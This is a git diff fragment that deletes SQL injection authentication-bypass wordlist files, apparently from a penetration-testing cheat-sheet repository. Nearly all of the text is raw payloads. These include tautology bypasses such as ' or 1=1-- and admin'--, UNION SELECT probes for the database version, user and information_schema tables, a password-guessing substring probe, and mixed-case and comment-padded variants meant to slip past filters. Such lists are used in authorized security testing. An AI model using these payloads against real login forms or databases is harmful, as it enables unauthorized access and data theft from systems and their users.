-') or ('1'='1
-') or ('1'='1--
-') or ('1'='1'--
-') or ('1'='1'/*
-') or ('1'='1'#
-'or'1=1
-'or'1=1′
-" or "1"="1
-" or "1"="1"--
-" or "1"="1"/*
-" or "1"="1"#
-" or 1=1
-" or 1=1 --
-" or 1=1 –
-" or 1=1--
-" or 1=1/*
-" or 1=1#
-" or 1=1–
-") or "1"="1
-") or "1"="1"--
-") or "1"="1"/*
-") or "1"="1"#
-") or ("1"="1
-") or ("1"="1"--
-") or ("1"="1"/*
-") or ("1"="1"#
-) or '1′='1–
-) or ('1′='1–
-' or 1=1 LIMIT 1;#
-'or 1=1 or ''='
-"or 1=1 or ""="
-' or 'a'='a
-' or a=a--
-' or a=a–
-') or ('a'='a
-" or "a"="a
-") or ("a"="a
-') or ('a'='a and hi") or ("a"="a
-' or 'one'='one
-' or 'one'='one–
-' or uid like '%
-' or uname like '%
-' or userid like '%
-' or user like '%
-' or username like '%
-' or 'x'='x
-') or ('x'='x
-" or "x"="x
-' OR 'x'='x'#;
-'=' 'or' and '=' 'or'
-' UNION ALL SELECT 1, @@version;#
-' UNION ALL SELECT system_user(),user();#
-' UNION select table_schema,table_name FROM information_Schema.tables;#
-admin' and substring(password/text(),1,1)='7
-' and substring(password/text(),1,1)='7
-
-==
-=
-'
-"
-'-- 2
-'/*
-'#
-"-- 2
-" #
-"/*
-'-'
-'&'
-'^'
-'*'
-'='
-0'<'2
-"-"
-"&"
-"^"
-"*"
-"="
-0"<"2
-
-')
-")
-')-- 2
-')/*
-')#
-")-- 2
-") #
-")/*
-')-('
-')&('
-')^('
-')*('
-')=('
-0')<('2
-")-("
-")&("
-")^("
-")*("
-")=("
-0")<("2
-
-'-''-- 2
-'-''#
-'-''/*
-'&''-- 2
-'&''#
-'&''/*
-'^''-- 2
-'^''#
-'^''/*
-'*''-- 2
-'*''#
-'*''/*
-'=''-- 2
-'=''#
-'=''/*
-0'<'2'-- 2
-0'<'2'#
-0'<'2'/*
-"-""-- 2
-"-""#
-"-""/*
-"&""-- 2
-"&""#
-"&""/*
-"^""-- 2
-"^""#
-"^""/*
-"*""-- 2
-"*""#
-"*""/*
-"=""-- 2
-"=""#
-"=""/*
-0"<"2"-- 2
-0"<"2"#
-0"<"2"/*
-
-')-''-- 2
-')-''#
-')-''/*
-')&''-- 2
-')&''#
-')&''/*
-')^''-- 2
-')^''#
-')^''/*
-')*''-- 2
-')*''#
-')*''/*
-')=''-- 2
-')=''#
-')=''/*
-0')<'2'-- 2
-0')<'2'#
-0')<'2'/*
-")-""-- 2
-")-""#
-")-""/*
-")&""-- 2
-")&""#
-")&""/*
-")^""-- 2
-")^""#
-")^""/*
-")*""-- 2
-")*""#
-")*""/*
-")=""-- 2
-")=""#
-")=""/*
-0")<"2-- 2
-0")<"2#
-0")<"2/*
-
-
-'oR'2
-'oR'2'-- 2
-'oR'2'#
-'oR'2'/*
-'oR'2'oR'
-'oR(2)-- 2
-'oR(2)#
-'oR(2)/*
-'oR(2)oR'
-'oR 2-- 2
-'oR 2#
-'oR 2/*
-'oR 2 oR'
-'oR/**/2-- 2
-'oR/**/2#
-'oR/**/2/*
-'oR/**/2/**/oR'
-"oR"2
-"oR"2"-- 2
-"oR"2"#
-"oR"2"/*
-"oR"2"oR"
-"oR(2)-- 2
-"oR(2)#
-"oR(2)/*
-"oR(2)oR"
-"oR 2-- 2
-"oR 2#
-"oR 2/*
-"oR 2 oR"
-"oR/**/2-- 2
-"oR/**/2#
-"oR/**/2/*
-"oR/**/2/**/oR"
-
-'oR'2'='2
-'oR'2'='2'oR'
-'oR'2'='2'-- 2
-'oR'2'='2'#
-'oR'2'='2'/*
-'oR'2'='2'oR'
-'oR 2=2-- 2
-'oR 2=2#
-'oR 2=2/*
-'oR 2=2 oR'
-'oR/**/2=2-- 2
-'oR/**/2=2#
-'oR/**/2=2/*
-'oR/**/2=2/**/oR'
-'oR(2)=2-- 2
-'oR(2)=2#
-'oR(2)=2/*
-'oR(2)=2/*
-'oR(2)=(2)oR'
-'oR'2'='2' LimIT 1-- 2
-'oR'2'='2' LimIT 1#
-'oR'2'='2' LimIT 1/*
-'oR(2)=(2)LimIT(1)-- 2
-'oR(2)=(2)LimIT(1)#
-'oR(2)=(2)LimIT(1)/*
-"oR"2"="2
-"oR"2"="2"oR"
-"oR"2"="2"-- 2
-"oR"2"="2"#
-"oR"2"="2"/*
-"oR"2"="2"oR"
-"oR 2=2-- 2
-"oR 2=2#
-"oR 2=2/*
-"oR 2=2 oR"
-"oR/**/2=2-- 2
-"oR/**/2=2#
-"oR/**/2=2/*
-"oR/**/2=2/**/oR"
-"oR(2)=2-- 2
-"oR(2)=2#
-"oR(2)=2/*
-"oR(2)=2/*
-"oR(2)=(2)oR"
-"oR"2"="2" LimIT 1-- 2
-"oR"2"="2" LimIT 1#
-"oR"2"="2" LimIT 1/*
-"oR(2)=(2)LimIT(1)-- 2
-"oR(2)=(2)LimIT(1)#
-"oR(2)=(2)LimIT(1)/*
-
-'oR true-- 2
-'oR true#
-'oR true/*
-'oR true oR'
-'oR(true)-- 2
-'oR(true)#
-'oR(true)/*
-'oR(true)oR'
-'oR/**/true-- 2
-'oR/**/true#
-'oR/**/true/*
-'oR/**/true/**/oR'
-"oR true-- 2
-"oR true#
-"oR true/*
-"oR true oR"
-"oR(true)-- 2
-"oR(true)#
-"oR(true)/*
-"oR(true)oR"
-"oR/**/true-- 2
-"oR/**/true#
-"oR/**/true/*
-"oR/**/true/**/oR"
-
-'oR'2'LiKE'2
-'oR'2'LiKE'2'-- 2
-'oR'2'LiKE'2'#
-'oR'2'LiKE'2'/*
-'oR'2'LiKE'2'oR'
-'oR(2)LiKE(2)-- 2
-'oR(2)LiKE(2)#
-'oR(2)LiKE(2)/*
-'oR(2)LiKE(2)oR'
-"oR"2"LiKE"2
-"oR"2"LiKE"2"-- 2
-"oR"2"LiKE"2"#
-"oR"2"LiKE"2"/*
-"oR"2"LiKE"2"oR"
-"oR(2)LiKE(2)-- 2
-"oR(2)LiKE(2)#
-"oR(2)LiKE(2)/*
-"oR(2)LiKE(2)oR"
-
-admin
-admin'-- 2
-admin'#
-admin'/*
-admin"-- 2
-admin"#
-ffifdyop
-
-' UniON SElecT 1,2-- 2
-' UniON SElecT 1,2,3-- 2
-' UniON SElecT 1,2,3,4-- 2
-' UniON SElecT 1,2,3,4,5-- 2
-' UniON SElecT 1,2#
-' UniON SElecT 1,2,3#
-' UniON SElecT 1,2,3,4#
-' UniON SElecT 1,2,3,4,5#
-'UniON(SElecT(1),2)-- 2
-'UniON(SElecT(1),2,3)-- 2
-'UniON(SElecT(1),2,3,4)-- 2
-'UniON(SElecT(1),2,3,4,5)-- 2
-'UniON(SElecT(1),2)#
-'UniON(SElecT(1),2,3)#
-'UniON(SElecT(1),2,3,4)#
-'UniON(SElecT(1),2,3,4,5)#
-" UniON SElecT 1,2-- 2
-" UniON SElecT 1,2,3-- 2
-" UniON SElecT 1,2,3,4-- 2
-" UniON SElecT 1,2,3,4,5-- 2
-" UniON SElecT 1,2#
-" UniON SElecT 1,2,3#
-" UniON SElecT 1,2,3,4#
-" UniON SElecT 1,2,3,4,5#
-"UniON(SElecT(1),2)-- 2
-"UniON(SElecT(1),2,3)-- 2
-"UniON(SElecT(1),2,3,4)-- 2
-"UniON(SElecT(1),2,3,4,5)-- 2
-"UniON(SElecT(1),2)#
-"UniON(SElecT(1),2,3)#
-"UniON(SElecT(1),2,3,4)#
-"UniON(SElecT(1),2,3,4,5)#
-
-'||'2
-'||2-- 2
-'||'2'||'
-'||2#
-'||2/*
-'||2||'
-"||"2
-"||2-- 2
-"||"2"||"
-"||2#
-"||2/*
-"||2||"
-'||'2'='2
-'||'2'='2'||'
-'||2=2-- 2
-'||2=2#
-'||2=2/*
-'||2=2||'
-"||"2"="2
-"||"2"="2"||"
-"||2=2-- 2
-"||2=2#
-"||2=2/*
-"||2=2||"
-'||2=(2)LimIT(1)-- 2
-'||2=(2)LimIT(1)#
-'||2=(2)LimIT(1)/*
-"||2=(2)LimIT(1)-- 2
-"||2=(2)LimIT(1)#
-"||2=(2)LimIT(1)/*
-'||true-- 2
-'||true#
-'||true/*
-'||true||'
-"||true-- 2
-"||true#
-"||true/*
-"||true||"
-'||'2'LiKE'2
-'||'2'LiKE'2'-- 2
-'||'2'LiKE'2'#
-'||'2'LiKE'2'/*
-'||'2'LiKE'2'||'
-'||(2)LiKE(2)-- 2
-'||(2)LiKE(2)#
-'||(2)LiKE(2)/*
-'||(2)LiKE(2)||'
-"||"2"LiKE"2
-"||"2"LiKE"2"-- 2
-"||"2"LiKE"2"#
-"||"2"LiKE"2"/*
-"||"2"LiKE"2"||"
-"||(2)LiKE(2)-- 2
-"||(2)LiKE(2)#
-"||(2)LiKE(2)/*
-"||(2)LiKE(2)||"
-
-')oR('2
-')oR'2'-- 2
-')oR'2'#
-')oR'2'/*
-')oR'2'oR('
-')oR(2)-- 2
-')oR(2)#
-')oR(2)/*
-')oR(2)oR('
-')oR 2-- 2
-')oR 2#
-')oR 2/*
-')oR 2 oR('
-')oR/**/2-- 2
-')oR/**/2#
-')oR/**/2/*
-')oR/**/2/**/oR('
-")oR("2
-")oR"2"-- 2
-")oR"2"#
-")oR"2"/*
-")oR"2"oR("
-")oR(2)-- 2
-")oR(2)#
-")oR(2)/*
-")oR(2)oR("
-")oR 2-- 2
-")oR 2#
-")oR 2/*
-")oR 2 oR("
-")oR/**/2-- 2
-")oR/**/2#
-")oR/**/2/*
-")oR/**/2/**/oR("
-')oR'2'=('2
-')oR'2'='2'oR('
-')oR'2'='2'-- 2
-')oR'2'='2'#
-')oR'2'='2'/*
-')oR'2'='2'oR('
-')oR 2=2-- 2
-')oR 2=2#
-')oR 2=2/*
-')oR 2=2 oR('
-')oR/**/2=2-- 2
-')oR/**/2=2#
-')oR/**/2=2/*
-')oR/**/2=2/**/oR('
-')oR(2)=2-- 2
-')oR(2)=2#
-')oR(2)=2/*
-')oR(2)=2/*
-')oR(2)=(2)oR('
-')oR'2'='2' LimIT 1-- 2
-')oR'2'='2' LimIT 1#
-')oR'2'='2' LimIT 1/*
-')oR(2)=(2)LimIT(1)-- 2
-')oR(2)=(2)LimIT(1)#
-')oR(2)=(2)LimIT(1)/*
-")oR"2"=("2
-")oR"2"="2"oR("
-")oR"2"="2"-- 2
-")oR"2"="2"#
-")oR"2"="2"/*
-")oR"2"="2"oR("
-")oR 2=2-- 2
-")oR 2=2#
-")oR 2=2/*
-")oR 2=2 oR("
-")oR/**/2=2-- 2
-")oR/**/2=2#
-")oR/**/2=2/*
-")oR/**/2=2/**/oR("
-")oR(2)=2-- 2
-")oR(2)=2#
-")oR(2)=2/*
-")oR(2)=2/*
-")oR(2)=(2)oR("
-")oR"2"="2" LimIT 1-- 2
-")oR"2"="2" LimIT 1#
-")oR"2"="2" LimIT 1/*
-")oR(2)=(2)LimIT(1)-- 2
-")oR(2)=(2)LimIT(1)#
-")oR(2)=(2)LimIT(1)/*
-')oR true-- 2
-')oR true#
-')oR true/*
-')oR true oR('
-')oR(true)-- 2
-')oR(true)#
-')oR(true)/*
-')oR(true)oR('
-')oR/**/true-- 2
-')oR/**/true#
-')oR/**/true/*
-')oR/**/true/**/oR('
-")oR true-- 2
-")oR true#
-")oR true/*
-")oR true oR("
-")oR(true)-- 2
-")oR(true)#
-")oR(true)/*
-")oR(true)oR("
-")oR/**/true-- 2
-")oR/**/true#
-")oR/**/true/*
-")oR/**/true/**/oR("
-')oR'2'LiKE('2
-')oR'2'LiKE'2'-- 2
-')oR'2'LiKE'2'#
-')oR'2'LiKE'2'/*
-')oR'2'LiKE'2'oR('
-')oR(2)LiKE(2)-- 2
-')oR(2)LiKE(2)#
-')oR(2)LiKE(2)/*
-')oR(2)LiKE(2)oR('
-")oR"2"LiKE("2
-")oR"2"LiKE"2"-- 2
-")oR"2"LiKE"2"#
-")oR"2"LiKE"2"/*
-")oR"2"LiKE"2"oR("
-")oR(2)LiKE(2)-- 2
-")oR(2)LiKE(2)#
-")oR(2)LiKE(2)/*
-")oR(2)LiKE(2)oR("
-admin')-- 2
-admin')#
-admin')/*
-admin")-- 2
-admin")#
-') UniON SElecT 1,2-- 2
-') UniON SElecT 1,2,3-- 2
-') UniON SElecT 1,2,3,4-- 2
-') UniON SElecT 1,2,3,4,5-- 2
-') UniON SElecT 1,2#
-') UniON SElecT 1,2,3#
-') UniON SElecT 1,2,3,4#
-') UniON SElecT 1,2,3,4,5#
-')UniON(SElecT(1),2)-- 2
-')UniON(SElecT(1),2,3)-- 2
-')UniON(SElecT(1),2,3,4)-- 2
-')UniON(SElecT(1),2,3,4,5)-- 2
-')UniON(SElecT(1),2)#
-')UniON(SElecT(1),2,3)#
-')UniON(SElecT(1),2,3,4)#
-')UniON(SElecT(1),2,3,4,5)#
-") UniON SElecT 1,2-- 2
-") UniON SElecT 1,2,3-- 2
-") UniON SElecT 1,2,3,4-- 2
-") UniON SElecT 1,2,3,4,5-- 2
-") UniON SElecT 1,2#
-") UniON SElecT 1,2,3#
-") UniON SElecT 1,2,3,4#
-") UniON SElecT 1,2,3,4,5#
-")UniON(SElecT(1),2)-- 2
-")UniON(SElecT(1),2,3)-- 2
-")UniON(SElecT(1),2,3,4)-- 2
-")UniON(SElecT(1),2,3,4,5)-- 2
-")UniON(SElecT(1),2)#
-")UniON(SElecT(1),2,3)#
-")UniON(SElecT(1),2,3,4)#
-")UniON(SElecT(1),2,3,4,5)#
-')||('2
-')||2-- 2
-')||'2'||('
-')||2#
-')||2/*
-')||2||('
-")||("2
-")||2-- 2
-")||"2"||("
-")||2#
-")||2/*
-")||2||("
-')||'2'=('2
-')||'2'='2'||('
-')||2=2-- 2
-')||2=2#
-')||2=2/*
-')||2=2||('
-")||"2"=("2
-")||"2"="2"||("
-")||2=2-- 2
-")||2=2#
-")||2=2/*
-")||2=2||("
-')||2=(2)LimIT(1)-- 2
-')||2=(2)LimIT(1)#
-')||2=(2)LimIT(1)/*
-")||2=(2)LimIT(1)-- 2
-")||2=(2)LimIT(1)#
-")||2=(2)LimIT(1)/*
-')||true-- 2
-')||true#
-')||true/*
-')||true||('
-")||true-- 2
-")||true#
-")||true/*
-")||true||("
-')||'2'LiKE('2
-')||'2'LiKE'2'-- 2
-')||'2'LiKE'2'#
-')||'2'LiKE'2'/*
-')||'2'LiKE'2'||('
-')||(2)LiKE(2)-- 2
-')||(2)LiKE(2)#
-')||(2)LiKE(2)/*
-')||(2)LiKE(2)||('
-")||"2"LiKE("2
-")||"2"LiKE"2"-- 2
-")||"2"LiKE"2"#
-")||"2"LiKE"2"/*
-")||"2"LiKE"2"||("
-")||(2)LiKE(2)-- 2
-")||(2)LiKE(2)#
-")||(2)LiKE(2)/*
-")||(2)LiKE(2)||("
-' UnION SELeCT 1,2`
-' UnION SELeCT 1,2,3`
-' UnION SELeCT 1,2,3,4`
-' UnION SELeCT 1,2,3,4,5`
-" UnION SELeCT 1,2`
-" UnION SELeCT 1,2,3`
-" UnION SELeCT 1,2,3,4`
-" UnION SELeCT 1,2,3,4,5`
\ No newline at end of file
diff --git a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt b/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt
deleted file mode 100644
index 5a03da57f..000000000
--- a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt
+++ /dev/null
@@ -1,771 +0,0 @@
-'-'
-' '
-'&'
-'^'
-'*'
-' or ''-'
-' or '' '
-' or ''&'
-' or ''^'
-' or ''*'
-"-"
-" "
-"&"
-"^"
-"*"
-" or ""-"
-" or "" "
-" or ""&"
-" or ""^"
-" or ""*"
-or true--
-" or true--
-' or true--
-") or true--
-') or true--
-' or 'x'='x
-') or ('x')=('x
-')) or (('x'))=(('x
-" or "x"="x
-") or ("x")=("x
-")) or (("x"))=(("x
-or 1=1
-or 1=1--
-or 1=1#
-or 1=1/*
-admin' --
-admin' #
-admin'/*
-admin' or '1'='1
-admin' or '1'='1'--
-admin' or '1'='1'#
-admin' or '1'='1'/*
-admin'or 1=1 or ''='
-admin' or 1=1
-admin' or 1=1--
-admin' or 1=1#
-admin' or 1=1/*
-admin') or ('1'='1
-admin') or ('1'='1'--
-admin') or ('1'='1'#
-admin') or ('1'='1'/*
-admin') or '1'='1
-admin') or '1'='1'--
-admin') or '1'='1'#
-admin') or '1'='1'/*
-1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
-admin" --
-admin" #
-admin"/*
-admin" or "1"="1
-admin" or "1"="1"--
-admin" or "1"="1"#
-admin" or "1"="1"/*
-admin"or 1=1 or ""="
-admin" or 1=1
-admin" or 1=1--
-admin" or 1=1#
-admin" or 1=1/*
-admin") or ("1"="1
-admin") or ("1"="1"--
-admin") or ("1"="1"#
-admin") or ("1"="1"/*
-admin") or "1"="1
-admin") or "1"="1"--
-admin") or "1"="1"#
-admin") or "1"="1"/*
-1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
-==
-=
-'
-' --
-' #
-' –
-'--
-'/*
-'#
-" --
-" #
-"/*
-' and 1='1
-' and a='a
- or 1=1
- or true
-' or ''='
-" or ""="
-1′) and '1′='1–
-' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
-" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
- and 1=1
- and 1=1–
-' and 'one'='one
-' and 'one'='one–
-' group by password having 1=1--
-' group by userid having 1=1--
-' group by username having 1=1--
- like '%'
- or 0=0 --
- or 0=0 #
- or 0=0 –
-' or 0=0 #
-' or 0=0 --
-' or 0=0 #
-' or 0=0 –
-" or 0=0 --
-" or 0=0 #
-" or 0=0 –
-%' or '0'='0
- or 1=1
- or 1=1--
- or 1=1/*
- or 1=1#
- or 1=1–
-' or 1=1--
-' or '1'='1
-' or '1'='1'--
-' or '1'='1'/*
-' or '1'='1'#
-' or '1′='1
-' or 1=1
-' or 1=1 --
-' or 1=1 –
-' or 1=1--
-' or 1=1;#
-' or 1=1/*
-' or 1=1#
-' or 1=1–
-') or '1'='1
-') or '1'='1--
-') or '1'='1'--
-') or '1'='1'/*
-') or '1'='1'#
-') or ('1'='1
-') or ('1'='1--
-') or ('1'='1'--
-') or ('1'='1'/*
-') or ('1'='1'#
-'or'1=1
-'or'1=1′
-" or "1"="1
-" or "1"="1"--
-" or "1"="1"/*
-" or "1"="1"#
-" or 1=1
-" or 1=1 --
-" or 1=1 –
-" or 1=1--
-" or 1=1/*
-" or 1=1#
-" or 1=1–
-") or "1"="1
-") or "1"="1"--
-") or "1"="1"/*
-") or "1"="1"#
-") or ("1"="1
-") or ("1"="1"--
-") or ("1"="1"/*
-") or ("1"="1"#
-) or '1′='1–
-) or ('1′='1–
-' or 1=1 LIMIT 1;#
-'or 1=1 or ''='
-"or 1=1 or ""="
-' or 'a'='a
-' or a=a--
-' or a=a–
-') or ('a'='a
-" or "a"="a
-") or ("a"="a
-') or ('a'='a and hi") or ("a"="a
-' or 'one'='one
-' or 'one'='one–
-' or uid like '%
-' or uname like '%
-' or userid like '%
-' or user like '%
-' or username like '%
-' or 'x'='x
-') or ('x'='x
-" or "x"="x
-' OR 'x'='x'#;
-'=' 'or' and '=' 'or'
-' UNION ALL SELECT 1, @@version;#
-' UNION ALL SELECT system_user(),user();#
-' UNION select table_schema,table_name FROM information_Schema.tables;#
-admin' and substring(password/text(),1,1)='7
-' and substring(password/text(),1,1)='7
-
-==
-=
-'
-"
-'-- 2
-'/*
-'#
-"-- 2
-" #
-"/*
-'-'
-'&'
-'^'
-'*'
-'='
-0'<'2
-"-"
-"&"
-"^"
-"*"
-"="
-0"<"2
-
-')
-")
-')-- 2
-')/*
-')#
-")-- 2
-") #
-")/*
-')-('
-')&('
-')^('
-')*('
-')=('
-0')<('2
-")-("
-")&("
-")^("
-")*("
-")=("
-0")<("2
-
-'-''-- 2
-'-''#
-'-''/*
-'&''-- 2
-'&''#
-'&''/*
-'^''-- 2
-'^''#
-'^''/*
-'*''-- 2
-'*''#
-'*''/*
-'=''-- 2
-'=''#
-'=''/*
-0'<'2'-- 2
-0'<'2'#
-0'<'2'/*
-"-""-- 2
-"-""#
-"-""/*
-"&""-- 2
-"&""#
-"&""/*
-"^""-- 2
-"^""#
-"^""/*
-"*""-- 2
-"*""#
-"*""/*
-"=""-- 2
-"=""#
-"=""/*
-0"<"2"-- 2
-0"<"2"#
-0"<"2"/*
-
-')-''-- 2
-')-''#
-')-''/*
-')&''-- 2
-')&''#
-')&''/*
-')^''-- 2
-')^''#
-')^''/*
-')*''-- 2
-')*''#
-')*''/*
-')=''-- 2
-')=''#
-')=''/*
-0')<'2'-- 2
-0')<'2'#
-0')<'2'/*
-")-""-- 2
-")-""#
-")-""/*
-")&""-- 2
-")&""#
-")&""/*
-")^""-- 2
-")^""#
-")^""/*
-")*""-- 2
-")*""#
-")*""/*
-")=""-- 2
-")=""#
-")=""/*
-0")<"2-- 2
-0")<"2#
-0")<"2/*
-
-
-'oR'2
-'oR'2'-- 2
-'oR'2'#
-'oR'2'/*
-'oR'2'oR'
-'oR(2)-- 2
-'oR(2)#
-'oR(2)/*
-'oR(2)oR'
-'oR 2-- 2
-'oR 2#
-'oR 2/*
-'oR 2 oR'
-'oR/**/2-- 2
-'oR/**/2#
-'oR/**/2/*
-'oR/**/2/**/oR'
-"oR"2
-"oR"2"-- 2
-"oR"2"#
-"oR"2"/*
-"oR"2"oR"
-"oR(2)-- 2
-"oR(2)#
-"oR(2)/*
-"oR(2)oR"
-"oR 2-- 2
-"oR 2#
-"oR 2/*
-"oR 2 oR"
-"oR/**/2-- 2
-"oR/**/2#
-"oR/**/2/*
-"oR/**/2/**/oR"
-
-'oR'2'='2
-'oR'2'='2'oR'
-'oR'2'='2'-- 2
-'oR'2'='2'#
-'oR'2'='2'/*
-'oR'2'='2'oR'
-'oR 2=2-- 2
-'oR 2=2#
-'oR 2=2/*
-'oR 2=2 oR'
-'oR/**/2=2-- 2
-'oR/**/2=2#
-'oR/**/2=2/*
-'oR/**/2=2/**/oR'
-'oR(2)=2-- 2
-'oR(2)=2#
-'oR(2)=2/*
-'oR(2)=2/*
-'oR(2)=(2)oR'
-'oR'2'='2' LimIT 1-- 2
-'oR'2'='2' LimIT 1#
-'oR'2'='2' LimIT 1/*
-'oR(2)=(2)LimIT(1)-- 2
-'oR(2)=(2)LimIT(1)#
-'oR(2)=(2)LimIT(1)/*
-"oR"2"="2
-"oR"2"="2"oR"
-"oR"2"="2"-- 2
-"oR"2"="2"#
-"oR"2"="2"/*
-"oR"2"="2"oR"
-"oR 2=2-- 2
-"oR 2=2#
-"oR 2=2/*
-"oR 2=2 oR"
-"oR/**/2=2-- 2
-"oR/**/2=2#
-"oR/**/2=2/*
-"oR/**/2=2/**/oR"
-"oR(2)=2-- 2
-"oR(2)=2#
-"oR(2)=2/*
-"oR(2)=2/*
-"oR(2)=(2)oR"
-"oR"2"="2" LimIT 1-- 2
-"oR"2"="2" LimIT 1#
-"oR"2"="2" LimIT 1/*
-"oR(2)=(2)LimIT(1)-- 2
-"oR(2)=(2)LimIT(1)#
-"oR(2)=(2)LimIT(1)/*
-
-'oR true-- 2
-'oR true#
-'oR true/*
-'oR true oR'
-'oR(true)-- 2
-'oR(true)#
-'oR(true)/*
-'oR(true)oR'
-'oR/**/true-- 2
-'oR/**/true#
-'oR/**/true/*
-'oR/**/true/**/oR'
-"oR true-- 2
-"oR true#
-"oR true/*
-"oR true oR"
-"oR(true)-- 2
-"oR(true)#
-"oR(true)/*
-"oR(true)oR"
-"oR/**/true-- 2
-"oR/**/true#
-"oR/**/true/*
-"oR/**/true/**/oR"
-
-'oR'2'LiKE'2
-'oR'2'LiKE'2'-- 2
-'oR'2'LiKE'2'#
-'oR'2'LiKE'2'/*
-'oR'2'LiKE'2'oR'
-'oR(2)LiKE(2)-- 2
-'oR(2)LiKE(2)#
-'oR(2)LiKE(2)/*
-'oR(2)LiKE(2)oR'
-"oR"2"LiKE"2
-"oR"2"LiKE"2"-- 2
-"oR"2"LiKE"2"#
-"oR"2"LiKE"2"/*
-"oR"2"LiKE"2"oR"
-"oR(2)LiKE(2)-- 2
-"oR(2)LiKE(2)#
-"oR(2)LiKE(2)/*
-"oR(2)LiKE(2)oR"
-
-admin
-admin'-- 2
-admin'#
-admin'/*
-admin"-- 2
-admin"#
-ffifdyop
-
-' UniON SElecT 1,2-- 2
-' UniON SElecT 1,2,3-- 2
-' UniON SElecT 1,2,3,4-- 2
-' UniON SElecT 1,2,3,4,5-- 2
-' UniON SElecT 1,2#
-' UniON SElecT 1,2,3#
-' UniON SElecT 1,2,3,4#
-' UniON SElecT 1,2,3,4,5#
-'UniON(SElecT(1),2)-- 2
-'UniON(SElecT(1),2,3)-- 2
-'UniON(SElecT(1),2,3,4)-- 2
-'UniON(SElecT(1),2,3,4,5)-- 2
-'UniON(SElecT(1),2)#
-'UniON(SElecT(1),2,3)#
-'UniON(SElecT(1),2,3,4)#
-'UniON(SElecT(1),2,3,4,5)#
-" UniON SElecT 1,2-- 2
-" UniON SElecT 1,2,3-- 2
-" UniON SElecT 1,2,3,4-- 2
-" UniON SElecT 1,2,3,4,5-- 2
-" UniON SElecT 1,2#
-" UniON SElecT 1,2,3#
-" UniON SElecT 1,2,3,4#
-" UniON SElecT 1,2,3,4,5#
-"UniON(SElecT(1),2)-- 2
-"UniON(SElecT(1),2,3)-- 2
-"UniON(SElecT(1),2,3,4)-- 2
-"UniON(SElecT(1),2,3,4,5)-- 2
-"UniON(SElecT(1),2)#
-"UniON(SElecT(1),2,3)#
-"UniON(SElecT(1),2,3,4)#
-"UniON(SElecT(1),2,3,4,5)#
-
-'||'2
-'||2-- 2
-'||'2'||'
-'||2#
-'||2/*
-'||2||'
-"||"2
-"||2-- 2
-"||"2"||"
-"||2#
-"||2/*
-"||2||"
-'||'2'='2
-'||'2'='2'||'
-'||2=2-- 2
-'||2=2#
-'||2=2/*
-'||2=2||'
-"||"2"="2
-"||"2"="2"||"
-"||2=2-- 2
-"||2=2#
-"||2=2/*
-"||2=2||"
-'||2=(2)LimIT(1)-- 2
-'||2=(2)LimIT(1)#
-'||2=(2)LimIT(1)/*
-"||2=(2)LimIT(1)-- 2
-"||2=(2)LimIT(1)#
-"||2=(2)LimIT(1)/*
-'||true-- 2
-'||true#
-'||true/*
-'||true||'
-"||true-- 2
-"||true#
-"||true/*
-"||true||"
-'||'2'LiKE'2
-'||'2'LiKE'2'-- 2
-'||'2'LiKE'2'#
-'||'2'LiKE'2'/*
-'||'2'LiKE'2'||'
-'||(2)LiKE(2)-- 2
-'||(2)LiKE(2)#
-'||(2)LiKE(2)/*
-'||(2)LiKE(2)||'
-"||"2"LiKE"2
-"||"2"LiKE"2"-- 2
-"||"2"LiKE"2"#
-"||"2"LiKE"2"/*
-"||"2"LiKE"2"||"
-"||(2)LiKE(2)-- 2
-"||(2)LiKE(2)#
-"||(2)LiKE(2)/*
-"||(2)LiKE(2)||"
-
-')oR('2
-')oR'2'-- 2
-')oR'2'#
-')oR'2'/*
-')oR'2'oR('
-')oR(2)-- 2
-')oR(2)#
-')oR(2)/*
-')oR(2)oR('
-')oR 2-- 2
-')oR 2#
-')oR 2/*
-')oR 2 oR('
-')oR/**/2-- 2
-')oR/**/2#
-')oR/**/2/*
-')oR/**/2/**/oR('
-")oR("2
-")oR"2"-- 2
-")oR"2"#
-")oR"2"/*
-")oR"2"oR("
-")oR(2)-- 2
-")oR(2)#
-")oR(2)/*
-")oR(2)oR("
-")oR 2-- 2
-")oR 2#
-")oR 2/*
-")oR 2 oR("
-")oR/**/2-- 2
-")oR/**/2#
-")oR/**/2/*
-")oR/**/2/**/oR("
-')oR'2'=('2
-')oR'2'='2'oR('
-')oR'2'='2'-- 2
-')oR'2'='2'#
-')oR'2'='2'/*
-')oR'2'='2'oR('
-')oR 2=2-- 2
-')oR 2=2#
-')oR 2=2/*
-')oR 2=2 oR('
-')oR/**/2=2-- 2
-')oR/**/2=2#
-')oR/**/2=2/*
-')oR/**/2=2/**/oR('
-')oR(2)=2-- 2
-')oR(2)=2#
-')oR(2)=2/*
-')oR(2)=2/*
-')oR(2)=(2)oR('
-')oR'2'='2' LimIT 1-- 2
-')oR'2'='2' LimIT 1#
-')oR'2'='2' LimIT 1/*
-')oR(2)=(2)LimIT(1)-- 2
-')oR(2)=(2)LimIT(1)#
-')oR(2)=(2)LimIT(1)/*
-")oR"2"=("2
-")oR"2"="2"oR("
-")oR"2"="2"-- 2
-")oR"2"="2"#
-")oR"2"="2"/*
-")oR"2"="2"oR("
-")oR 2=2-- 2
-")oR 2=2#
-")oR 2=2/*
-")oR 2=2 oR("
-")oR/**/2=2-- 2
-")oR/**/2=2#
-")oR/**/2=2/*
-")oR/**/2=2/**/oR("
-")oR(2)=2-- 2
-")oR(2)=2#
-")oR(2)=2/*
-")oR(2)=2/*
-")oR(2)=(2)oR("
-")oR"2"="2" LimIT 1-- 2
-")oR"2"="2" LimIT 1#
-")oR"2"="2" LimIT 1/*
-")oR(2)=(2)LimIT(1)-- 2
-")oR(2)=(2)LimIT(1)#
-")oR(2)=(2)LimIT(1)/*
-')oR true-- 2
-')oR true#
-')oR true/*
-')oR true oR('
-')oR(true)-- 2
-')oR(true)#
-')oR(true)/*
-')oR(true)oR('
-')oR/**/true-- 2
-')oR/**/true#
-')oR/**/true/*
-')oR/**/true/**/oR('
-")oR true-- 2
-")oR true#
-")oR true/*
